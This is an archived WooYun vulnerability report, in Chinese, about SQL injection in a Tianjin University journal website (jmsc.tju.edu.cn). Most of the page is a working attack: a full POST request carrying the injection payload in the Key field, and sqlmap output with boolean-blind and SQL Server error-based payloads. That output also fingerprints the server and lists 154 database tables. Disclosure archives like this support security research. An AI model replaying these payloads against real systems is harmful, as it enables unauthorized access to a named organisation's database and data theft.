乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开
POST /ch/reader/wait_published_articles.aspx HTTP/1.1Content-Length: 1977Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://jmsc.tju.edu.cnCookie: ASP.NET_SessionId=ozyrudrrmn55mw55yrhioijrHost: jmsc.tju.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Query=%b2%e9%d1%af&Key=-1' OR 1=1* -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7%2btaRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF%2b6FLnfwckKF6TzPWPA%2bfrcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh%2bti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP%2bjhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR%2bm14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx%2bvEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx%2b5PGeUL2mEuasNiwuScVpEK%2btDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ%2bddNr9jOaM4/%2bLBOZjqbuUWPaVNtUz2Y791zcp/eHzV%2be20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe%2bLqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK%2bdPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe%2bP%2b9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb%2bZcLmFaScQnDKpj9pF1UntwWle6f%2biMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6%2blYbRe25eU%2bC3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof%2bVyj9v3eog/hJIUJIPDkbuba%2bo8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV%2bRhLZm1I0b%2bv0ESSDyK%2bwooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O%2byG%2bc0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4%2bLjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv%2b51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY%2by3JqObqOE11aCqRQ%3d%3d&__VIEWSTATEENCRYPTED=
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 1059=1059 -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7+taRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF+6FLnfwckKF6TzPWPA+frcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh+ti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP+jhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR+m14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx+vEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx+5PGeUL2mEuasNiwuScVpEK+tDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ+ddNr9jOaM4/+LBOZjqbuUWPaVNtUz2Y791zcp/eHzV+e20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe+LqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK+dPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe+P+9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb+ZcLmFaScQnDKpj9pF1UntwWle6f+iMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6+lYbRe25eU+C3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof+Vyj9v3eog/hJIUJIPDkbuba+o8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV+RhLZm1I0b+v0ESSDyK+wooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O+yG+c0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4+LjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv+51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY+y3JqObqOE11aCqRQ==&__VIEWSTATEENCRYPTED= Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 2755=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2755=2755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7+taRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF+6FLnfwckKF6TzPWPA+frcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh+ti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP+jhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR+m14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx+vEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx+5PGeUL2mEuasNiwuScVpEK+tDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ+ddNr9jOaM4/+LBOZjqbuUWPaVNtUz2Y791zcp/eHzV+e20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe+LqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK+dPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe+P+9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb+ZcLmFaScQnDKpj9pF1UntwWle6f+iMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6+lYbRe25eU+C3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof+Vyj9v3eog/hJIUJIPDkbuba+o8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV+RhLZm1I0b+v0ESSDyK+wooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O+yG+c0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4+LjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv+51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY+y3JqObqOE11aCqRQ==&__VIEWSTATEENCRYPTED=---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: jmsc_journal[154 tables]+-----------------------------------------+| GuestBook_Admin || GuestBook_Message || dtproperties || sysconstraints || syssegments || t_ad_click_detail || t_ad_cost || t_ad_customer || t_ad_position || t_ads || t_appraise_attache_list || t_article_appraise_bak || t_article_appraise_ext_bak || t_article_appraise_ext_history || t_article_appraise_history || t_article_attache_list || t_article_attache_list_all || t_article_attache_list_history || t_article_content || t_article_content_all || t_article_content_history || t_article_cost_history || t_article_duplicate_history || t_article_history || t_article_print_history || t_article_process_history_history || t_article_records_history || t_article_references_history || t_article_remark_history || t_article_view_history || t_article_view_history_indexed || t_audit_advice_attache_list || t_audit_advice_attache_list_all || t_audit_advice_attache_list_history || t_audit_advice_bak || t_audit_advice_content || t_audit_advice_content_all || t_audit_advice_content_bak || t_audit_advice_content_history || t_audit_advice_history || t_audit_cost_bak || t_audit_cost_history || t_auditor_menu || t_auditor_menu_category || t_auditor_menu_child || t_auditor_view_advice_history || t_auditor_view_attache_history || t_author_article_reference_history2 || t_author_article_reference_history_save || t_author_article_stat_history || t_author_concept_menu || t_author_info || t_author_menu || t_author_menu_category || t_author_menu_child || t_author_note || t_bargain_quarter_detail || t_bianwei || t_bianwei_info || t_bianwei_type || t_book_ad_bargain || t_book_ad_cost || t_book_ad_customer || t_book_ad_position || t_book_price || t_can_download_pdf_ip || t_cannot_download_pdf_ip || t_check_article_duplicate_history || t_column || t_column_category || t_concept_system_ext_menu || t_count_author_article || t_count_author_article_reference || t_counter || t_cross_article || t_cross_journal_list || t_customer_status || t_delete_four_key_data || t_delete_one_key_data || t_delete_three_key_data || t_delete_two_key_data || t_draft_article_attache_list || t_draft_article_content || t_edit_article_detail_content || t_edit_article_detail_content_all || t_edit_article_detail_content_history || t_edit_article_detail_history || t_edit_menu || t_edit_menu_category || t_edit_menu_child || t_edit_view_fulltext_history || t_editorial_concept_menu || t_editorial_menu || t_editorial_menu_category || t_editorial_menu_child || t_email_log || t_field_editorial_menu || t_field_editorial_menu_category || t_field_editorial_menu_child || t_file_content || t_fixed_content || t_fourth_menu || t_friend_link_category || t_friendlink || t_guestbook || t_guestbook_user || t_inquisition_cost_history || t_invoice_type || t_menu || t_menu_item || t_menu_subitem || t_news_category || t_news_second_category || t_nextcontent || t_nextcontent_author || t_order_toc_reader || t_other_journal_article_history || t_page_cost_history || t_post_elect_history || t_press || t_pub_article_attache_list || t_pub_author_article_reference || t_public_board || t_publish_article || t_publish_article_appraise || t_publish_article_appraise_list || t_publish_article_appraise_mood_list || t_publish_article_appraise_support || t_publish_article_appraise_type || t_publish_article_quick_search || t_publish_article_references || t_publish_article_was_referenced || t_publish_institution || t_reader_article_favorites || t_reader_menu || t_reader_menu_category || t_reader_menu_child || t_reviewer_concept_menu || t_send_author_book || t_sql_version || t_suggest_fence_auditor_history || t_wait_delete_article || t_wait_search_article || t_wait_search_author_article || t_wait_submit_article || t_wait_submit_delete_article || t_wait_submit_issue || t_wait_update_article || t_wait_update_issue || t_wait_zip_file || t_web_site_access || t_year || t_year_quarter || t_year_quarter_column |+-----------------------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-11-29 15:04
漏洞Rank:4 (WooYun评价)
暂无